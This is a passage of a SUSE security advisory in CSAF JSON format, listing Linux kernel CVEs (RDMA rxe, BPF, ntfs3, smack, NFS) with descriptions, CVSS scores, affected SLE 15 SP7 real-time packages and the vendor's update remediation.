"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-68372"
},
{
"cve": "CVE-2025-68379",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68379"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/rxe: Fix null deref on srq-\u003erq.queue after resize failure\n\nA NULL pointer dereference can occur in rxe_srq_chk_attr() when\nibv_modify_srq() is invoked twice in succession under certain error\nconditions. The first call may fail in rxe_queue_resize(), which leads\nrxe_srq_from_attr() to set srq-\u003erq.queue = NULL. The second call then\ntriggers a crash (null deref) when accessing\nsrq-\u003erq.queue-\u003ebuf-\u003eindex_mask.\n\nCall Trace:\n\u003cTASK\u003e\nrxe_modify_srq+0x170/0x480 [rdma_rxe]\n? __pfx_rxe_modify_srq+0x10/0x10 [rdma_rxe]\n? uverbs_try_lock_object+0x4f/0xa0 [ib_uverbs]\n? rdma_lookup_get_uobject+0x1f0/0x380 [ib_uverbs]\nib_uverbs_modify_srq+0x204/0x290 [ib_uverbs]\n? __pfx_ib_uverbs_modify_srq+0x10/0x10 [ib_uverbs]\n? tryinc_node_nr_active+0xe6/0x150\n? uverbs_fill_udata+0xed/0x4f0 [ib_uverbs]\nib_uverbs_handler_UVERBS_METHOD_INVOKE_WRITE+0x2c0/0x470 [ib_uverbs]\n? __pfx_ib_uverbs_handler_UVERBS_METHOD_INVOKE_WRITE+0x10/0x10 [ib_uverbs]\n? uverbs_fill_udata+0xed/0x4f0 [ib_uverbs]\nib_uverbs_run_method+0x55a/0x6e0 [ib_uverbs]\n? __pfx_ib_uverbs_handler_UVERBS_METHOD_INVOKE_WRITE+0x10/0x10 [ib_uverbs]\nib_uverbs_cmd_verbs+0x54d/0x800 [ib_uverbs]\n? __pfx_ib_uverbs_cmd_verbs+0x10/0x10 [ib_uverbs]\n? __pfx___raw_spin_lock_irqsave+0x10/0x10\n? __pfx_do_vfs_ioctl+0x10/0x10\n? ioctl_has_perm.constprop.0.isra.0+0x2c7/0x4c0\n? __pfx_ioctl_has_perm.constprop.0.isra.0+0x10/0x10\nib_uverbs_ioctl+0x13e/0x220 [ib_uverbs]\n? __pfx_ib_uverbs_ioctl+0x10/0x10 [ib_uverbs]\n__x64_sys_ioctl+0x138/0x1c0\ndo_syscall_64+0x82/0x250\n? fdget_pos+0x58/0x4c0\n? ksys_write+0xf3/0x1c0\n? __pfx_ksys_write+0x10/0x10\n? do_syscall_64+0xc8/0x250\n? __pfx_vm_mmap_pgoff+0x10/0x10\n? fget+0x173/0x230\n? fput+0x2a/0x80\n? ksys_mmap_pgoff+0x224/0x4c0\n? do_syscall_64+0xc8/0x250\n? do_user_addr_fault+0x37b/0xfe0\n? clear_bhb_loop+0x50/0xa0\n? clear_bhb_loop+0x50/0xa0\n? clear_bhb_loop+0x50/0xa0\nentry_SYSCALL_64_after_hwframe+0x76/0x7e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68379",
"url": "https://www.suse.com/security/cve/CVE-2025-68379"
},
{
"category": "external",
"summary": "SUSE Bug 1255695 for CVE-2025-68379",
"url": "https://bugzilla.suse.com/1255695"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-68379"
},
{
"cve": "CVE-2025-68725",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68725"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Do not let BPF test infra emit invalid GSO types to stack\n\nYinhao et al. reported that their fuzzer tool was able to trigger a\nskb_warn_bad_offload() from netif_skb_features() -\u003e gso_features_check().\nWhen a BPF program - triggered via BPF test infra - pushes the packet\nto the loopback device via bpf_clone_redirect() then mentioned offload\nwarning can be seen. GSO-related features are then rightfully disabled.\n\nWe get into this situation due to convert___skb_to_skb() setting\ngso_segs and gso_size but not gso_type. Technically, it makes sense\nthat this warning triggers since the GSO properties are malformed due\nto the gso_type. Potentially, the gso_type could be marked non-trustworthy\nthrough setting it at least to SKB_GSO_DODGY without any other specific\nassumptions, but that also feels wrong given we should not go further\ninto the GSO engine in the first place.\n\nThe checks were added in 121d57af308d (\"gso: validate gso_type in GSO\nhandlers\") because there were malicious (syzbot) senders that combine\na protocol with a non-matching gso_type. If we would want to drop such\npackets, gso_features_check() currently only returns feature flags via\nnetif_skb_features(), so one location for potentially dropping such skbs\ncould be validate_xmit_unreadable_skb(), but then otoh it would be\nan additional check in the fast-path for a very corner case. Given\nbpf_clone_redirect() is the only place where BPF test infra could emit\nsuch packets, lets reject them right there.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68725",
"url": "https://www.suse.com/security/cve/CVE-2025-68725"
},
{
"category": "external",
"summary": "SUSE Bug 1255569 for CVE-2025-68725",
"url": "https://bugzilla.suse.com/1255569"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-68725"
},
{
"cve": "CVE-2025-68727",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68727"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nntfs3: Fix uninit buffer allocated by __getname()\n\nFix uninit errors caused after buffer allocation given to \u0027de\u0027; by\ninitializing the buffer with zeroes. The fix was found by using KMSAN.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68727",
"url": "https://www.suse.com/security/cve/CVE-2025-68727"
},
{
"category": "external",
"summary": "SUSE Bug 1255568 for CVE-2025-68727",
"url": "https://bugzilla.suse.com/1255568"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-68727"
},
{
"cve": "CVE-2025-68728",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68728"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nntfs3: fix uninit memory after failed mi_read in mi_format_new\n\nFix a KMSAN un-init bug found by syzkaller.\n\nntfs_get_bh() expects a buffer from sb_getblk(), that buffer may not be\nuptodate. We do not bring the buffer uptodate before setting it as\nuptodate. If the buffer were to not be uptodate, it could mean adding a\nbuffer with un-init data to the mi record. Attempting to load that record\nwill trigger KMSAN.\n\nAvoid this by setting the buffer as uptodate, if it\u0027s not already, by\noverwriting it.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68728",
"url": "https://www.suse.com/security/cve/CVE-2025-68728"
},
{
"category": "external",
"summary": "SUSE Bug 1255539 for CVE-2025-68728",
"url": "https://bugzilla.suse.com/1255539"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-68728"
},
{
"cve": "CVE-2025-68733",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68733"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmack: fix bug: unprivileged task can create labels\n\nIf an unprivileged task is allowed to relabel itself\n(/smack/relabel-self is not empty),\nit can freely create new labels by writing their\nnames into own /proc/PID/attr/smack/current\n\nThis occurs because do_setattr() imports\nthe provided label in advance,\nbefore checking \"relabel-self\" list.\n\nThis change ensures that the \"relabel-self\" list\nis checked before importing the label.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68733",
"url": "https://www.suse.com/security/cve/CVE-2025-68733"
},
{
"category": "external",
"summary": "SUSE Bug 1255615 for CVE-2025-68733",
"url": "https://bugzilla.suse.com/1255615"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-68733"
},
{
"cve": "CVE-2025-68764",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68764"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nNFS: Automounted filesystems should inherit ro,noexec,nodev,sync flags\n\nWhen a filesystem is being automounted, it needs to preserve the\nuser-set superblock mount options, such as the \"ro\" flag.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68764",
"url": "https://www.suse.com/security/cve/CVE-2025-68764"
},
{
"category": "external",
"summary": "SUSE Bug 1255930 for CVE-2025-68764",
"url": "https://bugzilla.suse.com/1255930"
}
],
"remediations": [
{
"category": "vendor_fix",
